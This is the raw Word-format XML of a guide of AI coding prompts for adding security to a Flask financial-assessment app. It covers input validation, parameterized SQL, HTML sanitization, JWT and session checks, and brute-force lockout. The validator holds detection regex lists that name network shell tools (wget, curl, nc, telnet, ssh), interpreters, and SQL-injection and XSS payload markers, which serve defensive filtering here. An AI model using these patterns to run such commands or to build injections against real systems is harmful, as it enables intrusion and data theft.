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046B8" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007AE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 w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="004007AE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  <w:t>Secure MINGUS Landing Page Development Guide - Cursor Prompts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0605D046" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007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07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Execution Order and Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2813AF39" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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4007AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execute security prompts (S1-S6) immediately after each corresponding functional prompt to ensure security is built-in from the start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1635F47A" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="00FF44B7" w:rsidP="004007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80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:pict w14:anchorId="0FDD127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F0ACD6" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007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07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 PHASE: Critical Security Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62235047" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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07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S1: Input Validation and Injection Prevention (CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCB9904" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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4007AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> None - Must be implemented first</w:t>
      </w:r>
      <w:r w:rsidRPr="004007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007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Time:</w:t>
      </w:r>
      <w:r w:rsidRPr="004007AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 60-90 minutes</w:t>
      </w:r>
      <w:r w:rsidRPr="004007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007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Created:</w:t>
      </w:r>
      <w:r w:rsidRPr="004007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backend/security/input_validator.py</w:t>
      </w:r>
      <w:r w:rsidRPr="004007A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backend/security/decorators.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA3DD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Implement comprehensive input validation and injection prevention for all MINGUS assessment endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E43A9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5A8EE5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Enhanced Input Validation System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCBD1D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```python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D662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import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885434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typing import Any,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List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B72FBD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functools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import wraps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553378E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flask import request,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jsonify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32B16EE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BF7CCC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SecurityValidator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4C7912F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__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD8770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self.sql_patterns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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5BFCD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r"(\b(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union|select|insert|update|delete|drop|create|alter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)\b)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FFE37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r"(\b(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exec|execute|script|javascript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)\b)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C6A69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r"(--|#|/\*|\*/)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F1146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r"(\b(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or|and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)\b\s+\d+\s*[=&lt;&gt;])",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A91D7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r"(\b(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char|ascii|substring|length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)\b\s*\()",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDD55B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waitfor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\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s+delay|benchmark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\s*\()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D6F3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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410A43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1D78A8F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self.xss_patterns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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F72DE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r"(&lt;script[^&gt;]*&gt;.*?&lt;/script&gt;)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7C6E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javascript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:.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*)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886BF0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r"(on\w+\s*=)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545A1B4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r"(&lt;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iframe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[^&gt;]*&gt;)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD50FB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r"(&lt;object[^&gt;]*&gt;)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC8BDA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r"(&lt;embed[^&gt;]*&gt;)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2108F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r"(&lt;link[^&gt;]*&gt;)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616195E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r"(&lt;meta[^&gt;]*&gt;)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1160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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457743E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0B75508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self.cmd_patterns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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F5A2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r"(\b(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cat|ls|pwd|whoami|id|uname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)\b)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325287D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r"(\b(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rm|del|mkdir|touch|chmod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)\b)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2331749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r"(\b(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wget|curl|nc|telnet|ssh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)\b)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B52442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r"(\b(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python|perl|ruby|php|bash|sh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)\b)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0E808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r"(&amp;&amp;|\|\||;|`|\$\()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D66E4B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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F60F02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64E9364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validate_input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input_string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str) -&gt;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[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D3E0D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not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isinstance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input_string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str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18646D0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{"valid": False, "reason": "Input must be string"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB824E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366C669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input_lower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input_string.lower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77A8A34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1B8D586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SQL injection patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188621E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for pattern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self.sql_patterns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6CCF0EE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re.search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(pattern,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input_lower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re.IGNORECASE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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C97E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{"valid": False, "reason": "SQL injection attempt detected", "pattern": pattern}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDC51D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5B3D2FB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XSS patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BCAA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for pattern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self.xss_patterns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3D7A66B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re.search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(pattern,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input_lower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re.IGNORECASE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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC2A87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{"valid": False, "reason": "XSS attempt detected", "pattern": pattern}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4882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2FA76A1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command injection patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D400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for pattern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self.cmd_patterns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5FAF3B2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re.search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(pattern,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input_lower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re.IGNORECASE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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DB18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{"valid": False, "reason": "Command injection attempt detected", "pattern": pattern}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511101E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1483D88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Length validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116C7C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input_string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 &gt; 10000:  # Reasonable limit for assessment inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FAE62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{"valid": False, "reason": "Input too long"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B226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042CB6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{"valid": True}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D81983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FBA3EF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Security decorator for assessment endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F602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validate_assessment_input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(f):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E895E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@wraps(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCBA1A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decorated_function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(*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args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**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kwargs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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B062CC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validator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SecurityValidator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06EFF03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3DDE0F8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Validate JSON payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B062FF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request.json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076BF27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for key, value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request.json.items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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5341E59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isinstance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(value, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210F52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validation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validator.validate_input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(value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A585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if not validation["valid"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D27F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# Log security event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4833783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log_security_event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("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input_validation_failure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", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79979A0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request.headers.get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('X-User-ID', 'anonymous'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC629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            {"field": key, "reason": validation["reason"]})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F44A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jsonify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({"error": "Invalid input detected"}), 400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D96F9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599F0A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f(*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args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**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kwargs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5DB234D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decorated_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18A23E2E" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Parameterized Query Enforcement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233819E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sqlalchemy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import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A47107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3501CC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Secure database operations for assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D76F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SecureAssessmentDB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597A4FD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create_user_assessment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str,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str, responses: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445641C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Use parameterized queries only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C26322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query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205DF6B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INSERT INTO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user_assessments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responses_json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created_at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4FCF162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VALUES (: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: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:responses, NOW())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56910B0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""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15606B2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self.db.execute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(query, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFC653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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C35D2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</w:p>
    <w:p w14:paraId="18D94BC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'responses':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json.dumps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(responses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633DDED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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C0453" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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HTML Sanitization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175ED2E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import bleach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCD86D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markupsafe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import Markup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BBA6C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7FACA2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sanitize_html_input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input_string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str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B29550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Allow only safe HTML tags and attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF4C0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allowed_tags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['p',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 'strong',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em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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05612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allowed_attributes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{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6C9AC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6D7B02C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cleaned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bleach.clean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input_string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tags=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allowed_tags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attributes=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allowed_attributes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2325C27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return Markup(cleaned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA3128B" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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Integration Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0B563B" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Apply validation to all assessment submission endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F7F977" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Log all validation failures for monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422A1083" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Return user-friendly error messages without revealing attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C859F7" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Integrate with existing error handling patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B30338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363B0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Prompt S2: Authentication and JWT Security Enhancement (CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12836C1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**Dependencies:** Prompt S1 completed  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D65B1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**Estimated Time:** 75-90 minutes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787145B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**Files Created:** `backend/security/auth_security.py`, `backend/security/session_manager.py`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B63F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865A95" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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Strengthen authentication and JWT security for assessment system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4E0942" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Enhanced JWT Validation with Security Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC5D7A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jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23EF281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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E1CEF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import secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CD1CE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datetime import datetime,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timedelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CDA1DC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flask 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current_app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request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5827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typing import Optional,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Any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5AA58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C8E3DB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class SecureJWTManager:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3268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__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0049924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self.secret_key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current_app.config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['SECRET_KEY']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217CD4E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self.algorithm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'HS256'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0177F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self.token_blacklist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set()  # In production, use Redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C642E3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3A4E255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create_secure_token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str,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additional_claims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None) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FB2BE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payload = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0510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'sub':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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC23D8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iat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int(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()),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BF742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'exp': int(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()) + 3600,  </w:t>
      </w:r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1 hour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expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D6FB2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iss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mingus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-app',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696D762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aud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mingus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-users',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275AD3D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jti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secrets.token_urlsafe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(32),  # Unique token ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627CD95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request.remote_addr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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB6F7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_agent_hash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hash(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request.headers.get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('User-Agent', ''))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE1232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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510E0B4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22D3453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additional_claims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1E12043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payload.update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additional_claims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3438EAF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069B64B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jwt.encode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(payload,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self.secret_key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algorithm=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self.algorithm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1273AFE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7B2FE83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validate_secure_token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token: str) -&gt;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[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EC61C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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F89A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# Check if token is blacklisted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0173D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token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self.token_blacklist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6EC699B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{"valid": False, "reason": "Token revoked"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404A0D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509AD5A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payload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jwt.decode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</w:p>
    <w:p w14:paraId="5F0281E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token, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3ED49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self.secret_key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</w:p>
    <w:p w14:paraId="4B6E4B8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algorithms=[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self.algorithm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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6153FCA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options={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E10ED4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verify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_signature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True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6CCA9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verify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_exp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True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4C31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verify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_iat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True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC569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verify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_iss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True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F1C80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verify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_aud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True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9375C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'require': ['exp',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iat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 'sub',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jti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iss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aud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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B41B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B405A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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4AD10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444109A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# Verify issuer and audience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D046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payload.get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iss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 !=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mingus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-app':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F5D2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{"valid": False, "reason": "Invalid issuer"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE58AA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7005925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payload.get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aud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 !=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mingus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-users':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CD0E9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{"valid": False, "reason": "Invalid audience"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B5AD2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55C11D3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# Check IP address consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C89C13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payload.get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') !=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request.remote_addr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7BC6EBD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log_security_event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("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ip_mismatch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", payload['sub'], {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1953922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"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token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_ip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payload.get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'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361B527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"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_ip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request.remote_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="513766B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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C38E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{"valid": False, "reason": "IP address mismatch"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF8EC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3CA5E74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# Check User-Agent consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A646F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current_ua_hash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hash(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request.headers.get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('User-Agent', ''))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE3A9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payload.get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user_agent_hash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') !=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current_ua_hash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201A952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log_security_event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("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user_agent_mismatch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", payload['sub'], {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D92BB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"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token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_ua_hash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payload.get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user_agent_hash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'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F2C4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"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current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_ua_hash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current_ua_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="780271F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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DBDAB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{"valid": False, "reason": "User agent mismatch"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D62763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255E371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{"valid": True, "payload": payload}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A73FA5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3E56DF8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except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jwt.ExpiredSignatureError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25C9F95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{"valid": False, "reason": "Token expired"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E3F8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except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jwt.InvalidTokenError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as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308863E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{"valid": False, "reason":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f"Invalid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token: {str(e)}"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6E704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56D67DA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revoke_token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(self, token: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F677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self.token_blacklist.add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(token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67519E2A" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Brute Force Protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412DB25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redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11204BF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datetime import datetime,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timedelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F0FF73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28BA55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BruteForceProtection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0252C27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__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFB0A2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self.redis_client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redis.Redis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(host='localhost', port=6379,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db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=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C03EA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self.max_attempts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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F582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self.lockout_duration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300  # 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D562D8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0E1C9D9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is_locked_out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(self, identifier: str) -&gt; bool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6304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key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f"lockout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:{identifier}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0607C54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self.redis_client.exists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(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7327FD6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60310C4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record_failed_attempt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identifier: str) -&gt;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[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B0813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key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f"attempts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:{identifier}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A062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attempts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self.redis_client.incr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(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A9F01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self.redis_client.expire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(key,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self.lockout_duration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6C6C5C7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1425728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attempts &gt;=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self.max_attempts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7BA8027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lockout_key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f"lockout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:{identifier}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777312A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self.redis_client.setex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lockout_key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self.lockout_duration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"locked")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A05E7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675529E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log_security_event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("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account_locked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", identifier, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4934D2D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"attempts": attempts,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A885E3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"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lockout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_duration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self.lockout_duration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C941A7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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8D61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5BCA48C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{"locked": True, "attempts": attempts}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5625D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55F6DAD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{"locked": False, "attempts": attempts}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3617E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083F38A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clear_attempts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(self, identifier: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6C585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key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f"attempts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:{identifier}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638527D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self.redis_client.delete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(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06564C3C" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Session Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B7473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class SecureSessionManager:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D33729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__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BF65B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self.session_timeout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3600  # 1 hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD0D8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self.redis_client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redis.Redis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(host='localhost', port=6379,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db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=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED69F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7206BB6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create_secure_session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str, token: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074FA79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secrets.token_urlsafe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(32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC676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4376B7D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C76ED5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'token': token,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C450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created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_at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(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F71D5C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last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_activity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(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D22BC6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ip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_address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request.remote_addr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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A3CE7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_agent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request.headers.get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('User-Agent')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F343A2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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7568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5BAFAF7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self.redis_client.setex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</w:p>
    <w:p w14:paraId="7DEC59E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f"session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}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42BB2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self.session_timeout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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E13A4B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json.dumps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02A29B3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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3329FA6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C79193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session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CC8455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2A19F59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validate_session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str) -&gt;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[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EFCF5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self.redis_client.get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f"session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}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF11D0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not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1EF2B39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{"valid": False, "reason": "Session not found"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE1585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307C8D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json.loads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3CAFDC6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41A6690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session age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2817173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() -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created_at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'] &gt;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self.session_timeout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18E185C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self.revoke_session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1ED4CD2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{"valid": False, "reason": "Session expired"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CEFFB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434482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IP consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C0B6A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ip_address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'] !=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request.remote_addr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402B8D8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log_security_event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("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session_ip_mismatch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",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'], {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E0D5E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"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_ip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ip_address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'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097B97D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"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_ip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request.remote_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="657C525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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D70BC6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self.revoke_session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18F7EC7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{"valid": False, "reason": "IP mismatch"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A369A2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1BC54BC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Update last activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF8B0F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last_activity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']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31AAAD6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self.redis_client.setex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</w:p>
    <w:p w14:paraId="7BCA499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f"session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}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7505A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self.session_timeout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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1666F10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json.dumps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063A2C3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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BFA93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53CBEF1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{"valid": True, "session":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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519FF0BD" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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Integration Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE36E7A" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Replace all existing JWT validation with secure validation</w:t>
      </w:r>
    </w:p>
